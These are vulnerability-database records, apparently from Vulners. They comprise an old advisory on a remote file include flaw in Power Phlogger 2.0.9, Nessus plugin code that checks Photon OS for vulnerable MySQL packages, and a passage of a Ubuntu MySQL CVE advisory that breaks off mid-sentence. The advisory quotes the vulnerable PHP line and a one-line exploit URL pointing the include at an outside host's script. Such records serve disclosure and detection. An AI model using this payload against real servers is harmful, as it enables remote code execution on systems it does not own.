{"id": "SECURITYVULNS:DOC:14804", "bulletinFamily": "software", "title": "Power Phlogger 2.0.9 Remote|Local File Include Vulnerability", "description": "#################################\r\n# Power Phlogger 2.0.9 - #\r\n#################################\r\n#Class: Remote|Local File Include Vulnerability\r\n# Remote: Yes\r\n# Local: No\r\n# Type: High\r\n# Site: http://www.comscripts.com/scripts/php.power-phlogger.211.html #\r\n# Author: x_w0x\r\n# Contact: x_w0x@hotmail.com\r\n###################################\r\n#Vuln Code\r\n(config.inc.php3):\r\n<?php\r\ninclude $rel_path."functions.php3";//nothing here\r\n?>\r\n\r\n#\r\nhttp://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt\r\n\r\n\r\n#Gr££tz:makoki, azzcoder,xoron,osm@n\r\n#Speciale gr££tz: str0ke, and elite-team\r\n\r\n# milw0rm.com [2006-10-19]\r\n\r\n", "published": "2006-10-23T00:00:00", "modified": "2006-10-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14804", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:19", "edition": 1, "viewCount": 54, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-08-31T11:10:19", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2526297", "KB317244", "KB981401", "KB2410679", "KB2785908", "KB2526305", "KB953331", "KB2404575", "KB3191913", "KB2874216"]}], "modified": "2018-08-31T11:10:19", "rev": 2}, "vulnersScore": 1.0}, "affectedSoftware": [], "immutableFields": []}

{"nessus": [{"lastseen": "2021-04-07T14:18:46", "description": "An update of the mysql package has been released.", "edition": 1, "cvss3": {"score": 8.0, "vector": "AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-04-07T00:00:00", "title": "Photon OS 4.0: Mysql PHSA-2021-4.0-0007", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-2032", "CVE-2021-2058", "CVE-2020-14837", "CVE-2021-2031", "CVE-2020-14765", "CVE-2020-14869", "CVE-2020-14777", "CVE-2021-2011", "CVE-2020-14829", "CVE-2021-2036", "CVE-2021-2065", "CVE-2020-11080", "CVE-2020-14866", "CVE-2020-14769", "CVE-2020-14844", "CVE-2020-14800", "CVE-2021-2048", "CVE-2020-14848", "CVE-2021-2056", "CVE-2020-14812", "CVE-2020-14845", "CVE-2020-14809", "CVE-2021-2030", "CVE-2020-14786", "CVE-2020-11656", "CVE-2020-14852", "CVE-2021-2072", "CVE-2021-2076", "CVE-2020-14776", "CVE-2020-14773", "CVE-2021-2022", "CVE-2021-2087", "CVE-2021-2122", "CVE-2020-14861", "CVE-2020-14821", "CVE-2021-2070", "CVE-2020-14793", "CVE-2020-14891", "CVE-2020-14789", "CVE-2020-14804", "CVE-2020-14775", "CVE-2021-2038", "CVE-2020-1971", "CVE-2020-14828", "CVE-2020-14838", "CVE-2020-14830", "CVE-2020-11655", "CVE-2021-2088", "CVE-2021-2021", "CVE-2021-2055", "CVE-2020-14785", "CVE-2020-14868", "CVE-2020-14888", "CVE-2020-14794", "CVE-2020-14814", "CVE-2020-14893", "CVE-2020-14878", "CVE-2020-14839", "CVE-2021-2024", "CVE-2021-2061", "CVE-2021-2028", "CVE-2020-15358", "CVE-2020-14873", "CVE-2020-14870", "CVE-2021-2010", "CVE-2020-14836", "CVE-2021-2046", "CVE-2021-2002", "CVE-2021-2081", "CVE-2020-14846", "CVE-2020-14827", "CVE-2021-2060", "CVE-2020-14790", "CVE-2020-14867"], "modified": "2021-04-07T00:00:00", "cpe": ["cpe:/o:vmware:photonos:4.0", "p-cpe:/a:vmware:photonos:mysql"], "id": "PHOTONOS_PHSA-2021-4_0-0007_MYSQL.NASL", "href": "https://www.tenable.com/plugins/nessus/148357", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-4.0-0007. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148357);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/07\");\n\n script_cve_id(\n \"CVE-2020-11080\",\n \"CVE-2020-11655\",\n \"CVE-2020-11656\",\n \"CVE-2020-14765\",\n \"CVE-2020-14769\",\n \"CVE-2020-14773\",\n \"CVE-2020-14775\",\n \"CVE-2020-14776\",\n \"CVE-2020-14777\",\n \"CVE-2020-14785\",\n \"CVE-2020-14786\",\n \"CVE-2020-14789\",\n \"CVE-2020-14790\",\n \"CVE-2020-14793\",\n \"CVE-2020-14794\",\n \"CVE-2020-14800\",\n \"CVE-2020-14804\",\n \"CVE-2020-14809\",\n \"CVE-2020-14812\",\n \"CVE-2020-14814\",\n \"CVE-2020-14821\",\n \"CVE-2020-14827\",\n \"CVE-2020-14828\",\n \"CVE-2020-14829\",\n \"CVE-2020-14830\",\n \"CVE-2020-14836\",\n \"CVE-2020-14837\",\n \"CVE-2020-14838\",\n \"CVE-2020-14839\",\n \"CVE-2020-14844\",\n \"CVE-2020-14845\",\n \"CVE-2020-14846\",\n \"CVE-2020-14848\",\n \"CVE-2020-14852\",\n \"CVE-2020-14861\",\n \"CVE-2020-14866\",\n \"CVE-2020-14867\",\n \"CVE-2020-14868\",\n \"CVE-2020-14869\",\n \"CVE-2020-14870\",\n \"CVE-2020-14873\",\n \"CVE-2020-14878\",\n \"CVE-2020-14888\",\n \"CVE-2020-14891\",\n \"CVE-2020-14893\",\n \"CVE-2020-15358\",\n \"CVE-2020-1971\",\n \"CVE-2021-2002\",\n \"CVE-2021-2010\",\n \"CVE-2021-2011\",\n \"CVE-2021-2021\",\n \"CVE-2021-2022\",\n \"CVE-2021-2024\",\n \"CVE-2021-2028\",\n \"CVE-2021-2030\",\n \"CVE-2021-2031\",\n \"CVE-2021-2032\",\n \"CVE-2021-2036\",\n \"CVE-2021-2038\",\n \"CVE-2021-2046\",\n \"CVE-2021-2048\",\n \"CVE-2021-2055\",\n \"CVE-2021-2056\",\n \"CVE-2021-2058\",\n \"CVE-2021-2060\",\n \"CVE-2021-2061\",\n \"CVE-2021-2065\",\n \"CVE-2021-2070\",\n \"CVE-2021-2072\",\n \"CVE-2021-2076\",\n \"CVE-2021-2081\",\n \"CVE-2021-2087\",\n \"CVE-2021-2088\",\n \"CVE-2021-2122\"\n );\n\n script_name(english:\"Photon OS 4.0: Mysql PHSA-2021-4.0-0007\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the mysql package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-4.0-7.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14878\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:4.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 4\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 4.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-4.0', cpu:'x86_64', reference:'mysql-8.0.23-1.ph4')) flag++;\nif (rpm_check(release:'PhotonOS-4.0', cpu:'x86_64', reference:'mysql-devel-8.0.23-1.ph4')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'mysql');\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-13T01:09:24", "description": "An update of the mysql package has been released.", "edition": 2, "cvss3": {"score": 8.0, "vector": "AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-10T00:00:00", "title": "Photon OS 3.0: Mysql PHSA-2020-3.0-0160", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14837", "CVE-2020-14765", "CVE-2020-14869", "CVE-2020-14777", "CVE-2020-14829", "CVE-2020-14866", "CVE-2020-14769", "CVE-2020-14844", "CVE-2020-14800", "CVE-2020-14848", "CVE-2020-14812", "CVE-2020-14845", "CVE-2020-14809", "CVE-2020-14786", "CVE-2020-14852", "CVE-2020-14776", "CVE-2020-14773", "CVE-2020-14861", "CVE-2020-14821", "CVE-2020-14793", "CVE-2020-14891", "CVE-2020-14789", "CVE-2020-14804", "CVE-2020-14775", "CVE-2020-14828", "CVE-2020-14838", "CVE-2020-14830", "CVE-2020-14785", "CVE-2020-14868", "CVE-2020-14888", "CVE-2020-14794", "CVE-2020-14814", "CVE-2020-14893", "CVE-2020-14878", "CVE-2020-14839", "CVE-2020-14873", "CVE-2020-14870", "CVE-2020-14836", "CVE-2020-14846", "CVE-2020-14827", "CVE-2020-14790", "CVE-2020-14867"], "modified": "2020-11-10T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:mysql", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2020-3_0-0160_MYSQL.NASL", "href": "https://www.tenable.com/plugins/nessus/142657", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-3.0-0160. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142657);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\n \"CVE-2020-14765\",\n \"CVE-2020-14769\",\n \"CVE-2020-14773\",\n \"CVE-2020-14775\",\n \"CVE-2020-14776\",\n \"CVE-2020-14777\",\n \"CVE-2020-14785\",\n \"CVE-2020-14786\",\n \"CVE-2020-14789\",\n \"CVE-2020-14790\",\n \"CVE-2020-14793\",\n \"CVE-2020-14794\",\n \"CVE-2020-14800\",\n \"CVE-2020-14804\",\n \"CVE-2020-14809\",\n \"CVE-2020-14812\",\n \"CVE-2020-14814\",\n \"CVE-2020-14821\",\n \"CVE-2020-14827\",\n \"CVE-2020-14828\",\n \"CVE-2020-14829\",\n \"CVE-2020-14830\",\n \"CVE-2020-14836\",\n \"CVE-2020-14837\",\n \"CVE-2020-14838\",\n \"CVE-2020-14839\",\n \"CVE-2020-14844\",\n \"CVE-2020-14845\",\n \"CVE-2020-14846\",\n \"CVE-2020-14848\",\n \"CVE-2020-14852\",\n \"CVE-2020-14861\",\n \"CVE-2020-14866\",\n \"CVE-2020-14867\",\n \"CVE-2020-14868\",\n \"CVE-2020-14869\",\n \"CVE-2020-14870\",\n \"CVE-2020-14873\",\n \"CVE-2020-14878\",\n \"CVE-2020-14888\",\n \"CVE-2020-14891\",\n \"CVE-2020-14893\"\n );\n\n script_name(english:\"Photon OS 3.0: Mysql PHSA-2020-3.0-0160\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the mysql package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-160.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14878\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'mysql-8.0.22-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'mysql-devel-8.0.22-1.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'mysql');\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-25T15:14:38", "description": "The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 host has packages installed that are affected by multiple\nvulnerabilities as referenced in the USN-4604-1 advisory.\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported\n versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14672)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported\n versions that are affected are 5.7.31 and prior. Easily exploitable vulnerability allows high privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server\n accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H). (CVE-2020-14760)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions\n that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows low privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14765)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported\n versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows low privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14769)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth).\n Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a\n partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.2 (Availability impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14771)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported\n versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14773, CVE-2020-14777, CVE-2020-14785,\n CVE-2020-14794, CVE-2020-14809, CVE-2020-14837, CVE-2020-14839, CVE-2020-14845, CVE-2020-14861,\n CVE-2020-14866, CVE-2020-14868, CVE-2020-14888, CVE-2020-14891, CVE-2020-14893)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are\n affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14775)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are\n affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high\n privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful\n attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable\n crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14776)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that\n are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with\n network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability\n can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL\n Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14786, CVE-2020-14844)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions\n that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high\n privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful\n attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable\n crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14789)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that\n are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high\n privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful\n attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable\n crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14790)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are\n affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with\n network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability\n can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server.\n CVSS 3.1 Base Score 2.2 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14791)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported\n versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14793)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption).\n Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low\n privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful\n attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable\n crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14800)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions\n that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker\n with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14804)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Locking). Supported versions\n that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows high privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang\n or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14812)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions\n that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker\n with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14814)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are\n affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with\n network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability\n can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL\n Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14821, CVE-2020-14829, CVE-2020-14848)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth).\n Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable\n vulnerability allows low privileged attacker with network access via multiple protocols to compromise\n MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data\n or complete access to all MySQL Server accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). (CVE-2020-14827)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions\n that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker\n with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity\n and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). (CVE-2020-14828)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported\n versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14830, CVE-2020-14836, CVE-2020-14846)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges).\n Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low\n privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful\n attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server\n accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N). (CVE-2020-14838)\n\n - Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Charsets). Supported\n versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged\n attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete\n DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). (CVE-2020-14852)\n\n - Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: NDBCluster Plugin).\n Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low\n privileged attacker with network access via multiple protocols to compromise MySQL Cluster. Successful\n attacks require human interaction from a person other than the attacker. Successful attacks of this\n 